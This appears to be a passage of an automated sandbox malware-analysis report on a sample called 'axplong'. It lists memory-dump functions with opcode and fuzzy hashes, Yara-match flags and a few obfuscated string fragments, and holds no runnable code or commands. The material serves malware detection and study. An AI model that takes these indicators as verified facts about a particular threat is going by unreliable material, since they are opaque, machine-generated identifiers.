                      • Instruction Fuzzy Hash: CD110FE734D115BEA14291852B545FA5A1FE7DB334B348027F407D5642FEC42A5B3132
                      Function 04FD0CA7 Relevance: .1, Instructions: 91COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59fd95e525bdff7faec79307a6ac843713f1bd79ae0579eb06ad9a815294c18a
                      • Instruction ID: 5750cbf02a7c8ad9651a619e5b5ee44791ea760ba6871dd98860002e0b4cb808
                      • Opcode Fuzzy Hash: 59fd95e525bdff7faec79307a6ac843713f1bd79ae0579eb06ad9a815294c18a
                      • Instruction Fuzzy Hash: 0811E9E738D115BEA14291852B145FA6A1FF7DB334B388027F50BD5642FEC42A9A3132
                      Function 04FD0CB0 Relevance: .1, Instructions: 87COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e42d72cb2627f2b68a5f1244d5efa04dff16a5d26fd03092f622b9b73bc9d6b6
                      • Instruction ID: a0784d8da613791843219a51e917ae83fe33b18919f5209f8c6b32d09c35b30e
                      • Opcode Fuzzy Hash: e42d72cb2627f2b68a5f1244d5efa04dff16a5d26fd03092f622b9b73bc9d6b6
                      • Instruction Fuzzy Hash: 7C11E5EB39C115BEA14291852B445FA6A1FF7DB334B388027F407D5642BEC42A9A3232
                      Function 04FD0D78 Relevance: .1, Instructions: 85COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 29e3b10e9ffe4321f4fd07b1d7d31c26cc0a1a7b56915efd21baffd74afb8705
                      • Instruction ID: 089dc79686f0158697aa01c0a7fa0d5d291b77bc8f825d42f96930e747cea938
                      • Opcode Fuzzy Hash: 29e3b10e9ffe4321f4fd07b1d7d31c26cc0a1a7b56915efd21baffd74afb8705
                      • Instruction Fuzzy Hash: 8F1125EB34D115BEE20295815B40AFA6A2BF7CAB38B388427F40BD5542FD85399B2131
                      Function 04FD0CCF Relevance: .1, Instructions: 84COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d404a940b5637580933f0972b68b0d5ade9e3580ebc54224865af381394d0d8
                      • Instruction ID: 1a4c2fef19069d8e4de1b41a9a8d236f68f5ed5524bc55fa4cd4b9227a1b6dd0
                      • Opcode Fuzzy Hash: 9d404a940b5637580933f0972b68b0d5ade9e3580ebc54224865af381394d0d8
                      • Instruction Fuzzy Hash: A301C8EB24C111BEE10251856B045FAA62FE7D6734B348427F407C6642BED439963132
                      Function 04FD0D44 Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08e5fbb14be8799f0d3d1015f90fcdc1a1386e3a8c88cb0b0ed858e319d9e236
                      • Instruction ID: a4864eb34ec73f46044e49d54a1513ffec1095f603d556b60cc9691b273b59e3
                      • Opcode Fuzzy Hash: 08e5fbb14be8799f0d3d1015f90fcdc1a1386e3a8c88cb0b0ed858e319d9e236
                      • Instruction Fuzzy Hash: 4E01E5AB24D115BED20295852B04AFAAA2BF7C6734B388027F407D5542FE843A9A6131
                      Function 04FD0CEA Relevance: .1, Instructions: 71COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1774e200adf6699e0791a0871b530fcf6d495ccdcc10fecbde2e0ca96b380b22
                      • Instruction ID: 93077e4fbced7e0c868dcfb57fed20c1252924030ed74662c42705ad6c6786e6
                      • Opcode Fuzzy Hash: 1774e200adf6699e0791a0871b530fcf6d495ccdcc10fecbde2e0ca96b380b22
                      • Instruction Fuzzy Hash: 9301D8FB34C115BEE24295855B449FA6A2FF7DA334B388427B407D5541FEC4399A3131
                      Function 04FD0D37 Relevance: .0, Instructions: 41COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c5efd395cf9a5f618383c61637abac4f828808874f474bc6571c98f4a4aabf7b
                      • Instruction ID: 9566a0b8c3dd85d1dfdeb135e209d430c9cc73f192a0551b256f16ca7e0a984a
                      • Opcode Fuzzy Hash: c5efd395cf9a5f618383c61637abac4f828808874f474bc6571c98f4a4aabf7b
                      • Instruction Fuzzy Hash: 6BE0EDA731C211EFC042548267410BAA91BB7AB238B3C4127A447C6601BEC874A33122
                      Function 04FD0D85 Relevance: .0, Instructions: 35COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 56552a5fe0b6deb5553af62bc3e84b88387966530c9878d499a941bd3201edff
                      • Instruction ID: 3092eca7bb55e19206b68ed52e354cbe7056d054509ccc7285ae96bab4fdc9ae
                      • Opcode Fuzzy Hash: 56552a5fe0b6deb5553af62bc3e84b88387966530c9878d499a941bd3201edff
                      • Instruction Fuzzy Hash: 8CE020E33681216E810345C116801F66B56BB7B13573C4457E547C6703ED8865637231
                      Function 04FD0D6A Relevance: .0, Instructions: 34COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 76876b0208db351ee77a031f26399f5ae0ad038dde663f215751c917fe24689b
                      • Instruction ID: 68b9bd3ffbe8b4588166734adde04106aeafc2df7efee38d88e6c5166df4b61e
                      • Opcode Fuzzy Hash: 76876b0208db351ee77a031f26399f5ae0ad038dde663f215751c917fe24689b
                      • Instruction Fuzzy Hash: CBE0CD97358115DEC04315C657405B6995BB7BF739B3C4117B107C6702BDC435E77121
                      Function 04FD0DA3 Relevance: .0, Instructions: 26COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 18be1480db51e455f31f47af01cc6f8f5833ef1c5efc5181f9e44d38cb7307e3
                      • Instruction ID: f0f4d2cd5652fecf9d1bbe00ebce6e3cccf5704b3e47666e6a568b1d4450cd15
                      • Opcode Fuzzy Hash: 18be1480db51e455f31f47af01cc6f8f5833ef1c5efc5181f9e44d38cb7307e3
                      • Instruction Fuzzy Hash: BAD02B4330D2607EE102949116445B65E064B5B779F388097E647C2A43ECC834267222

                      Non-executed Functions

                      Function 006DE440 Relevance: 14.6, Strings: 11, Instructions: 878COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4s$fed3aa
                      • API String ID: 0-906029795
                      • Opcode ID: cbafdb1940c822ca6cf8a5433b5be8272e7ac70c281e467e155477b7f8189903
                      • Instruction ID: 9ba633ec9ab0228bbd20e366e3d8c7b547e7a8163542637a8497d90b284238ad
                      • Opcode Fuzzy Hash: cbafdb1940c822ca6cf8a5433b5be8272e7ac70c281e467e155477b7f8189903
                      • Instruction Fuzzy Hash: B972F670E05388DBEF14EF68C9497DE7BB6AB41304F50819DE8056B3C2D7799A84CB92
                      Function 00713068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 610e47a81e04a8ab313e5464c5c3e7bd6ff3d3c0fd9120343d2d36a106d37ccf
                      • Instruction ID: 11d617e28fbb4dde361b17db458d03c794cc8085d721c8b775073c8c18b09ab6
                      • Opcode Fuzzy Hash: 610e47a81e04a8ab313e5464c5c3e7bd6ff3d3c0fd9120343d2d36a106d37ccf
                      • Instruction Fuzzy Hash: 8EC21B71E086288FDB25CE28DD447E9B7B9EB48315F1441EAD84DE7280E779AEC58F40
                      Function 00712BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: 2f32493ded070a97f7de9f7f35a72eadd71545e6be41eae8ee1dbf049eabd3f0
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: E3F12C71E002199FDF14CFACC8806EEB7B5FF48314F15826AE819A7385D735AE528B94
                      Function 006ED312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: 'knd+s$'knd+s
                      • API String ID: 2659868963-2223898734
                      • Opcode ID: 6660bbd854475553af4894018db25253dc53cd43e4715a30cfb7af0b51aa6031
                      • Instruction ID: 9267820d37a82a8b3ee9d11070d9724185ad4f9bfd58ef97cdd45f91d19bfca2
                      • Opcode Fuzzy Hash: 6660bbd854475553af4894018db25253dc53cd43e4715a30cfb7af0b51aa6031
                      • Instruction Fuzzy Hash: EC51A9B1A017498FEB19CF5ADC857AABBF6FB08310F24C52AD404EB291D3789941CF54
                      Function 006ECB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,006ECE82,?,?,?,?,006ECEB7,?,?,?,?,?,?,006EC42D,?,00000001), ref: 006ECB33
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 2752a818bfdcfbc0ff6505cb250b2fe19b2a898af02873179bee6f712a0b98d7
                      • Instruction ID: c60033ec4ed83dab4de9292edc34dc9c4f33c166ca119d5f987a570a378ce02b
                      • Opcode Fuzzy Hash: 2752a818bfdcfbc0ff6505cb250b2fe19b2a898af02873179bee6f712a0b98d7
                      • Instruction Fuzzy Hash: F0D022325036B8DBCA213B99AC098EDBB4A9A00B203418112EC0827220CA906C034BE8
                      Function 00707D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: 87019e20bb088422450625af2529c8baac87a4fb667cb65ef2f4fe52fa81607b
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: CE517470E0D649EADB3C8A38C8DA7BE67DA9F51300F140759E482DB6C2CA5DBD46C352
                      Function 006D4CF0 Relevance: .7, Instructions: 701COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e02b63d657d967d02c0d224c5f00c433c1d78a32b81238f3a0d8bea4b99122ac
                      • Instruction ID: 141bb393fb31d69f40588ec68963e1d1dcc979645e2dcd65b6ce50bac2bb7f9b
                      • Opcode Fuzzy Hash: e02b63d657d967d02c0d224c5f00c433c1d78a32b81238f3a0d8bea4b99122ac
                      • Instruction Fuzzy Hash: D62251B3F515144BDB4CCB5DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                      Function 00716F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 79461097934ef0765da3ed4925a050a8093cb179f6cbc79553c813dda6c354af
                      • Instruction ID: 75e3bace1ecf22bf17f8cf2dc4698de858608a809aa79c1bd9f085b83ae99db5
                      • Opcode Fuzzy Hash: 79461097934ef0765da3ed4925a050a8093cb179f6cbc79553c813dda6c354af
                      • Instruction Fuzzy Hash: FAB12A316146099FD719CF2CC486BA57BB1FF49364F258658E89ACF2E1C739E982CB40
                      Function 006D4AF0 Relevance: .2, Instructions: 158COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb6cf6b7988d77bb8aaa04a04cc3a2e38973c93858cafe73c2d7772ed7bf3b56
                      • Instruction ID: 07f6f9e9c3a400d41dad9351ac9d4118cb2566ca5dbdec3a891d0fa918ba9133
                      • Opcode Fuzzy Hash: cb6cf6b7988d77bb8aaa04a04cc3a2e38973c93858cafe73c2d7772ed7bf3b56
                      • Instruction Fuzzy Hash: 6051C27060D3D18FD359CF2D851563ABFE2AF95200F084A9EE0D687392DB79DA44CB92
                      Function 0071777B Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
